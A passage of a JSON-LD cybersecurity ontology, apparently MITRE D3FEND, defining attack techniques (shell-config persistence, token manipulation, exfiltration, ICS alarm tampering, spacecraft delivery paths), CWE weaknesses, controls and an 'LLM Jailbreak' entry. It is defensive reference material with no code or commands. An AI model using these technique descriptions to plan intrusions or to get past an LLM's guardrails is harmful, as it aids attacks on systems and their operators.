      "d3f:definition": "Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (<code>/etc</code>) and the user’s home directory (<code>~/</code>) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.",
      "d3f:modifies": {
        "@id": "d3f:UserInitConfigurationFile"
      },
      "rdfs:label": "Unix Shell Configuration Modification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:N0b82f1f21b2943d1a6fcfd8b624a6509"
        }
      ]
    },
    {
      "@id": "_:N0b82f1f21b2943d1a6fcfd8b624a6509",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInitConfigurationFile"
      }
    },
    {
      "@id": "d3f:T1037.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1037.003",
      "d3f:definition": "Group Policy Object / Active Directory Users and Computers are both Active Directory-based.",
      "d3f:modifies": {
        "@id": "d3f:NetworkInitScriptFileResource"
      },
      "rdfs:label": "Network Logon Script",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1037"
        },
        {
          "@id": "_:N437ba71df0dd4aeb9fd7ea7bd5837491"
        }
      ]
    },
    {
      "@id": "_:N437ba71df0dd4aeb9fd7ea7bd5837491",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkInitScriptFileResource"
      }
    },
    {
      "@id": "d3f:CWE-362",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-362",
      "d3f:definition": "The product contains a concurrent code sequence that requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence operating concurrently.",
      "d3f:synonym": "Race Condition",
      "d3f:weakness-of": {
        "@id": "d3f:SharedResourceAccessFunction"
      },
      "rdfs:label": "Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-691"
        },
        {
          "@id": "_:Nfab449ffec454514bcdd299690f6bd93"
        }
      ]
    },
    {
      "@id": "_:Nfab449ffec454514bcdd299690f6bd93",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedResourceAccessFunction"
      }
    },
    {
      "@id": "d3f:CCI-000205_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces minimum password length.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-22T00:00:00"
      },
      "rdfs:label": "CCI-000205"
    },
    {
      "@id": "d3f:TransportLink",
      "@type": "owl:Class",
      "d3f:definition": "A Transport Link is a type of logical link that exists at the transport layer of a network or system architecture.",
      "rdfs:label": "Transport Link",
      "rdfs:subClassOf": {
        "@id": "d3f:LogicalLink"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_17",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Domain Authentication",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "rdfs:label": "AC-4(17)"
    },
    {
      "@id": "d3f:T0840",
      "@type": "owl:Class",
      "d3f:attack-id": "T0840",
      "d3f:definition": "Adversaries may perform network connection enumeration to discover information about device communication patterns. If an adversary can inspect the state of a network connection with tools, such as Netstat(Citation: Netstat), in conjunction with [System Firmware](https://attack.mitre.org/techniques/T0857), then they can determine the role of certain devices on the network (Citation: MITRE). The adversary can also use [Network Sniffing](https://attack.mitre.org/techniques/T0842) to watch network traffic for details about the source, destination, protocol, and content.",
      "rdfs:label": "Network Connection Enumeration - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSDiscoveryTechnique"
      },
      "skos:prefLabel": "Network Connection Enumeration"
    },
    {
      "@id": "d3f:IntrusionPreventionSystem",
      "@type": "owl:Class",
      "d3f:definition": "Intrusion prevention systems (IPS), also known as intrusion detection and prevention systems (IDPS), are network security appliances that monitor network or system activities for malicious activity. The main functions of intrusion prevention systems are to identify malicious activity, log information about this activity, report it and attempt to block or stop it.\n\nIntrusion prevention systems are considered extensions of intrusion detection systems because they both monitor network traffic and/or system activities for malicious activity. The main differences are, unlike intrusion detection systems, intrusion prevention systems are placed in-line and are able to actively prevent or block intrusions that are detected. IPS can take such actions as sending an alarm, dropping detected malicious packets, resetting a connection or blocking traffic from the offending IP address. An IPS also can correct cyclic redundancy check (CRC) errors, defragment packet streams, mitigate TCP sequencing issues, and clean up unwanted transport and network layer options.",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Intrusion_detection_system#Intrusion_prevention"
      },
      "rdfs:label": "Intrusion Prevention System",
      "rdfs:seeAlso": {
        "@id": "dbr:Intrusion_detection_system"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IntrusionDetectionSystem"
      },
      "skos:altLabel": [
        "IDPS",
        "IPS",
        "Intrusion Detection and Prevention System"
      ]
    },
    {
      "@id": "d3f:CWE-211",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-211",
      "d3f:definition": "The product performs an operation that triggers an external diagnostic or error message that is not directly generated or controlled by the product, such as an error generated by the programming language interpreter that a software application uses. The error can contain sensitive system information.",
      "rdfs:label": "Externally-Generated Error Message Containing Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-209"
      }
    },
    {
      "@id": "d3f:RD-0004.01",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0004.01",
      "d3f:definition": "Adversaries select the pathway that best balances effect, risk, bandwidth, and attribution. Options include over-the-air telecommand injection on TT&C links, manipulation of payload downlinks or user terminals, abuse of crosslinks or gateways, pivoting through commercial ground networks, or pushing malicious updates via supply-chain paths (software, firmware, bitstreams). Selection considers modulation/coding, Doppler and polarization, anti-replay windows, pass geometry, rate/size limits, and expected operator workload (handover, LEOP, safing exits). For ground/cloud paths, actors account for identity boundaries, automation hooks, and change-control cadence. The “delivery mechanism” is end-to-end: RF front-end (antenna, converters, HPAs), baseband/SDR chain, protocol/framing, authentication/counter handling, scheduling, and fallbacks if detection occurs. Rehearsal artifacts, test vectors, mock dictionaries, ephemerides, are built alongside.",
      "rdfs:label": "Identify/Select Delivery Mechanism - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0004/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0004"
      },
      "skos:prefLabel": "Identify/Select Delivery Mechanism"
    },
    {
      "@id": "d3f:OffensiveTechnique",
      "@type": "owl:Class",
      "d3f:display-baseurl": "/offensive-technique/attack/",
      "rdfs:isDefinedBy": {
        "@id": "https://attack.mitre.org/docs/ATTACK_Design_and_Philosophy_March_2020.pdf"
      },
      "rdfs:label": "Offensive Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CyberTechnique"
        },
        {
          "@id": "_:N8fd6a018a0df4268b695e522835e4887"
        },
        {
          "@id": "_:Nce60f6d66bb04b3ea47f93697f7fc72a"
        }
      ]
    },
    {
      "@id": "_:N8fd6a018a0df4268b695e522835e4887",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OffensiveTactic"
      }
    },
    {
      "@id": "_:Nce60f6d66bb04b3ea47f93697f7fc72a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:initiates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Access"
      }
    },
    {
      "@id": "d3f:CWE-1112",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1112",
      "d3f:definition": "The document does not fully define all mechanisms that are used to control or influence how product-specific programs are executed.",
      "rdfs:label": "Incomplete Documentation of Program Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1059"
      }
    },
    {
      "@id": "d3f:Reference-PreventingExecutionOfTaskScheduledMalware_McAfeeLLC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20160105450A1"
      },
      "d3f:kb-abstract": "A method for preventing malware attacks includes the steps of detecting an attempt on an electronic device to access a task scheduler, determining an entity associated with the attempt to access the task scheduler, determining a malware status of the entity, and, based on the malware status of the entity, allowing or denying the attempted access to the task scheduler. The task scheduler is configured to launch one or more applications at a specified time or interval.",
      "d3f:kb-author": "Anil Ramabhatta, Harinath Vishwanath Ramachetty, Nandi Dharma Kishore",
      "d3f:kb-mitre-analysis": "Access to a job scheduler is intercepted using hooking or file filters to identify and analyze the source files, processes, destination files, or destination servers associated with a scheduled job. The identified servers or files associated with a job are compared against an anti-malware signature database or reputation server to determine if there is a match. If so, execution is denied and an alert is generated.",
      "d3f:kb-organization": "McAfee LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:ScheduledJobAnalysis"
      },
      "d3f:kb-reference-title": "Preventing execution of task scheduled malware",
      "rdfs:label": "Reference - Preventing execution of task scheduled malware - McAfee LLC"
    },
    {
      "@id": "d3f:LinuxExecveat",
      "@type": "owl:Class",
      "d3f:definition": "Execute program relative to a directory file descriptor. Behavior is similar to Linux Execve.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/execveat.2.html"
      },
      "rdfs:label": "Linux Execveat",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIExec"
      }
    },
    {
      "@id": "d3f:CWE-1021",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1021",
      "d3f:definition": "The web application does not restrict or incorrectly restricts frame objects or UI layers that belong to another application or domain, which can lead to user confusion about which interface the user is interacting with.",
      "d3f:synonym": [
        "Clickjacking",
        "Tapjacking",
        "UI Redress Attack"
      ],
      "rdfs:label": "Improper Restriction of Rendered UI Layers or Frames",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-441"
        },
        {
          "@id": "d3f:CWE-451"
        }
      ]
    },
    {
      "@id": "d3f:AML.T0054",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0054",
      "d3f:definition": "An adversary may use a carefully crafted [LLM Prompt Injection](/techniques/AML.T0051) designed to place the LLM in a state in which it will freely respond to any user input, bypassing any controls, restrictions, or guardrails placed on the LLM.\nOnce successfully jailbroken, the LLM can be used in unintended ways by the adversary.",
      "rdfs:label": "LLM Jailbreak - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0054"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATLASPrivilegeEscalationTechnique"
        }
      ],
      "skos:prefLabel": "LLM Jailbreak"
    },
    {
      "@id": "d3f:T1547.013",
      "@type": "owl:Class",
      "d3f:attack-id": "T1547.013",
      "d3f:definition": "Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a user’s desktop environment is loaded at login. XDG Autostart entries are available for any XDG-compliant Linux system. XDG Autostart entries use Desktop Entry files (`.desktop`) to configure the user’s desktop environment upon user login. These configuration files determine what applications launch upon user login, define associated applications to open specific file types, and define applications used to open removable media.(Citation: Free Desktop Application Autostart Feb 2006)(Citation: Free Desktop Entry Keys)",
      "rdfs:label": "XDG Autostart Entries",
      "rdfs:subClassOf": {
        "@id": "d3f:T1547"
      }
    },
    {
      "@id": "d3f:AccessControlConfiguration",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Information about what access permissions are granted to particular users for particular objects.",
      "rdfs:label": "Access Control Configuration",
      "rdfs:seeAlso": {
        "@id": "dbr:Access-control_list"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ConfigurationResource"
      }
    },
    {
      "@id": "d3f:HardwareTimerInterruptEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event in which a hardware timer generates an interrupt signal upon expiration or interval completion.",
      "rdfs:label": "Hardware Timer Interrupt Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareTimerEvent"
      }
    },
    {
      "@id": "d3f:RemoteDatabaseQuery",
      "@type": "owl:Class",
      "d3f:definition": "A remote query session enabling a user to make an SQL, SPARQL, or similar query over the network from one host to another.",
      "rdfs:label": "Remote Database Query",
      "rdfs:seeAlso": {
        "@id": "https://www.sciencedirect.com/topics/computer-science/remote-database-server"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DatabaseQuery"
        },
        {
          "@id": "d3f:RemoteCommand"
        }
      ]
    },
    {
      "@id": "d3f:Reference-ReferenceNullification_SecureSoftwareInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://cwe.mitre.org/documents/sources/TheCLASPApplicationSecurityProcess.pdf"
      },
      "d3f:kb-organization": "Secure Software, Inc.",
      "d3f:kb-reference-of": {
        "@id": "d3f:ReferenceNullification"
      },
      "d3f:kb-reference-title": "The CLASP Application Security Process",
      "rdfs:label": "Reference - Reference Nullification"
    },
    {
      "@id": "d3f:CWE-369",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-369",
      "d3f:definition": "The product divides a value by zero.",
      "rdfs:label": "Divide By Zero",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-682"
      }
    },
    {
      "@id": "d3f:CWE-1316",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1316",
      "d3f:definition": "The address map of the on-chip fabric has protected and unprotected regions overlapping, allowing an attacker to bypass access control to the overlapping portion of the protected region.",
      "rdfs:label": "Fabric-Address Map Allows Programming of Unwarranted Overlaps of Protected and Unprotected Ranges",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:OperatingSystemExecutableFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An operating system executable is a critical executable that is part of the operating system, and without which, the operating system may not operate correctly.",
      "rdfs:label": "Operating System Executable File",
      "rdfs:subClassOf": {
        "@id": "d3f:OperatingSystemFile"
      }
    },
    {
      "@id": "d3f:NaiveBayesClassifier",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-NBC",
      "d3f:definition": "The Naïve Bayes classifier is a supervised machine learning algorithm, which is used for classification tasks, like text classification. It is also part of a family of generative learning algorithms, meaning that it seeks to model the distribution of inputs of a given class or category.",
      "d3f:kb-article": "## References\nNaive Bayes. IBM. [Link](https://www.ibm.com/topics/naive-bayes?mhsrc=ibmsearch_a&mhq=naive%20bayes).",
      "rdfs:label": "Naive Bayes Classifier",
      "rdfs:subClassOf": {
        "@id": "d3f:Classification"
      }
    },
    {
      "@id": "d3f:WindowsOpenProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Opens an existing local process object.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNtOpenProcess"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess"
      },
      "rdfs:label": "Windows OpenProcess",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPITraceProcess"
        },
        {
          "@id": "_:Nf6248e6a01ee4c89b5eb5909c6c145e4"
        }
      ]
    },
    {
      "@id": "_:Nf6248e6a01ee4c89b5eb5909c6c145e4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtOpenProcess"
      }
    },
    {
      "@id": "d3f:WebServer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A web server is server software, or hardware dedicated to running this software, that can satisfy client requests on the World Wide Web. A web server can, in general, contain one or more websites. A web server processes incoming network requests over HTTP and several other related protocols. While the major function is to serve content, a full implementation of HTTP also includes ways of receiving content from clients. This feature is used for submitting web forms, including uploading of files.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Web_server"
      },
      "rdfs:label": "Web Server",
      "rdfs:subClassOf": {
        "@id": "d3f:Server"
      }
    },
    {
      "@id": "d3f:M1046",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:BootloaderAuthentication"
        },
        {
          "@id": "d3f:TPMBootIntegrity"
        }
      ],
      "rdfs:label": "Boot Integrity"
    },
    {
      "@id": "d3f:T1069.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1069.002",
      "d3f:definition": "Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.",
      "rdfs:label": "Domain Groups",
      "rdfs:subClassOf": {
        "@id": "d3f:T1069"
      }
    },
    {
      "@id": "d3f:CCI-002466_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system requests data integrity verification on the name/address resolution responses the system receives from authoritative sources.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002466"
    },
    {
      "@id": "d3f:LinuxSocketcallArgumentSYS_CONNECT",
      "@type": "owl:Class",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/socketcall.2.html"
      },
      "rdfs:label": "Linux Socketcall Argument SYS_CONNECT",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIConnectSocket"
      }
    },
    {
      "@id": "d3f:Kernel",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:KernelProcessTable"
      },
      "d3f:definition": "The kernel is a computer program that constitutes the central core of a computer's operating system. It has complete control over everything that occurs in the system. As such, it is the first program loaded on startup, and then manages the remainder of the startup, as well as input/output requests from software, translating them into data processing instructions for the central processing unit. It is also responsible for managing memory, and for managing and communicating with computing peripherals, like printers, speakers, etc. The kernel is a fundamental part of a modern computer's operating system.",
      "d3f:loads": {
        "@id": "d3f:Application"
      },
      "d3f:manages": [
        {
          "@id": "d3f:OperatingSystemProcess"
        },
        {
          "@id": "d3f:UserProcess"
        }
      ],
      "d3f:may-contain": [
        {
          "@id": "d3f:HardwareDriver"
        },
        {
          "@id": "d3f:KernelModule"
        }
      ],
      "rdfs:isDefinedBy": {
        "@id": "dbr:Kernel_(operating_system)"
      },
      "rdfs:label": "Kernel",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/kernel"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemSoftware"
        },
        {
          "@id": "_:N54f636456ce2464aaaf9c17c2de39211"
        },
        {
          "@id": "_:Naacd96f7906b4be6bf19db8e4f3a7c69"
        },
        {
          "@id": "_:N047f9440b04a486c85e23180f834acfc"
        },
        {
          "@id": "_:Nc320c87bdc59487d8d9b4e2bd11533a2"
        },
        {
          "@id": "_:N98f10988d9fc48eb8bcb2be2c2e1f190"
        },
        {
          "@id": "_:N3538f88549ec4604ad8cef32434abdb3"
        }
      ]
    },
    {
      "@id": "_:N54f636456ce2464aaaf9c17c2de39211",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KernelProcessTable"
      }
    },
    {
      "@id": "_:Naacd96f7906b4be6bf19db8e4f3a7c69",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:loads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Application"
      }
    },
    {
      "@id": "_:N047f9440b04a486c85e23180f834acfc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemProcess"
      }
    },
    {
      "@id": "_:Nc320c87bdc59487d8d9b4e2bd11533a2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserProcess"
      }
    },
    {
      "@id": "_:N98f10988d9fc48eb8bcb2be2c2e1f190",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDriver"
      }
    },
    {
      "@id": "_:N3538f88549ec4604ad8cef32434abdb3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KernelModule"
      }
    },
    {
      "@id": "d3f:T1639",
      "@type": "owl:Class",
      "d3f:attack-id": "T1639",
      "d3f:definition": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.",
      "rdfs:label": "Exfiltration Over Alternative Protocol - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileExfiltrationTechnique"
      },
      "skos:prefLabel": "Exfiltration Over Alternative Protocol"
    },
    {
      "@id": "d3f:CWE-1007",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1007",
      "d3f:definition": "The product displays information or identifiers to a user, but the display mechanism does not make it easy for the user to distinguish between visually similar or identical glyphs (homoglyphs), which may cause the user to misinterpret a glyph and perform an unintended, insecure action.",
      "d3f:synonym": "Homograph Attack",
      "rdfs:label": "Insufficient Visual Distinction of Homoglyphs Presented to User",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-451"
      }
    },
    {
      "@id": "d3f:mediates-access-to",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x mediates-access-to y: The entity x controls and brokers requests to reach entity y, enforcing the access rules that allow or deny it.",
      "rdfs:label": "mediates-access-to",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:may-counter-attack",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "may-counter-attack",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-tactically-associated-with"
      }
    },
    {
      "@id": "d3f:AddressSpace",
      "@type": "owl:Class",
      "d3f:definition": "An address space defines a range of discrete addresses, each of which may correspond to a network host, peripheral device, disk sector, a memory cell or other logical or physical entity. For software programs to save and retrieve stored data, each unit of data must have an address where it can be located. The number of address spaces available depends on the underlying address structure, which is usually limited by the computer architecture being used.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Address_space"
      },
      "rdfs:label": "Address Space",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:MemoryBlockStartValidation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3-MBSV",
      "d3f:definition": "Ensuring that a pointer accurately references the beginning of a designated memory block.",
      "d3f:hardens": {
        "@id": "d3f:MemoryFreeFunction"
      },
      "d3f:kb-article": "## How it Works\nEnsure that a pointer is referencing the beginning of the intended block before using.\n\n## Considerations\nBe careful with pointer arithmetic.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CManualPointerArithmetic_GNU"
      },
      "rdfs:label": "Memory Block Start Validation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PointerValidation"
        },
        {
          "@id": "_:Nabaabf5f201b40bf97347ac12074947b"
        }
      ]
    },
    {
      "@id": "_:Nabaabf5f201b40bf97347ac12074947b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryFreeFunction"
      }
    },
    {
      "@id": "d3f:T0838",
      "@type": "owl:Class",
      "d3f:attack-id": "T0838",
      "d3f:definition": "Adversaries may modify alarm settings to prevent alerts that may inform operators of their presence or to prevent responses to dangerous and unintended scenarios. Reporting messages are a standard part of data acquisition in control systems. Reporting messages are used as a way to transmit system state information and acknowledgements that specific actions have occurred. These messages provide vital information for the management of a physical process, and keep operators, engineers, and administrators aware of the state of system devices and physical processes.",
      "rdfs:label": "Modify Alarm Settings - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
      },
      "skos:prefLabel": "Modify Alarm Settings"
    },
    {
      "@id": "d3f:CommandHistoryLogFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:CommandHistoryLog"
      },
      "d3f:definition": "A command history log file is a file containing a command history, which is the history of commands run in an operating system shell.",
      "rdfs:label": "Command History Log File",
      "rdfs:seeAlso": {
        "@id": "dbr:Command_history"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:LogFile"
        },
        {
          "@id": "_:Nf6b85c43440341f784e3259ebf527d85"
        }
      ]
    },
    {
      "@id": "_:Nf6b85c43440341f784e3259ebf527d85",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CommandHistoryLog"
      }
    },
    {
      "@id": "d3f:DS0018",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A network security system, running locally on an endpoint or remotely as a service (ex: cloud environment), that monitors and controls incoming/outgoing network traffic based on predefined rules",
      "d3f:exactly": {
        "@id": "d3f:Firewall"
      },
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the Firewall Metadata component",
      "rdfs:label": "Firewall (ATT&CK DS)"
    },
    {
      "@id": "d3f:EXF-0003.02",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0003.02",
      "d3f:definition": "The attacker records spacecraft-to-ground traffic, real-time telemetry, recorder playbacks, payload products, and mirrored command sessions, to obtain mission data and health/state information. With sufficient signal quality and protocol knowledge, frames and packets are demodulated and extracted for offline use; where protection exists only on uplink or is inconsistently applied, downlink content may still be in clear. Downlinked command echoes, event logs, and file catalogs can expose internal activities and aid follow-on targeting while the primary objective remains data capture at scale.",
      "rdfs:label": "Downlink Exfiltration - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0003/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EXF-0003"
      },
      "skos:prefLabel": "Downlink Exfiltration"
    },
    {
      "@id": "d3f:CWE-224",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-224",
      "d3f:definition": "The product records security-relevant information according to an alternate name of the affected entity, instead of the canonical name.",
      "rdfs:label": "Obscured Security-relevant Information by Alternate Name",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-221"
      }
    },
    {
      "@id": "d3f:Reference-Anti-tamperSystemWithSelf-adjustingGuards_ARXANTECHNOLOGIESInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20150052603A1"
      },
      "d3f:kb-abstract": "An anti-tamper system is disclosed that includes self-adjusting guards inserted in software. Self-adjusting guards include invocation criteria and guard function. During run-time, each time the self-adjusting guard is invoked, the invocation criteria is evaluated and the guard function is only executed if the invocation criteria is satisfied. The invocation criteria can be static or dynamic, satisfied randomly with fixed or varying probability, a monotonically or exponentially decreasing function or most any other type of function. The invocation criteria can be satisfied based on elapsed inter-guard invocation time (time since last guard function execution), target inter-guard invocation time, and/or guard execution time. A method is disclosed of inserting self-adjusting guards into software, and executing the software. Evaluating the invocation criteria can include adjusting the invocation criteria when satisfied. The self-adjusting guards can be inserted into the software at a source or object code level.",
      "d3f:kb-author": "Kevin Dale Morgan",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "ARXAN TECHNOLOGIES Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessCodeSegmentVerification"
      },
      "d3f:kb-reference-title": "Anti-tamper system with self-adjusting guards",
      "rdfs:label": "Reference - Anti-tamper system with self-adjusting guards - ARXAN TECHNOLOGIES Inc"
    },
    {
      "@id": "d3f:ApplicationScanTime",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A variable that tracks the measured time it takes to begin, run, and complete a select portion of an application's logic.",
      "rdfs:label": "Application Scan Time",
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationRuntimeVariable"
      }
    },
    {
      "@id": "d3f:T1134",
      "@type": "owl:Class",
      "d3f:attack-id": "T1134",
      "d3f:definition": "Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.",
      "rdfs:label": "Access Token Manipulation",
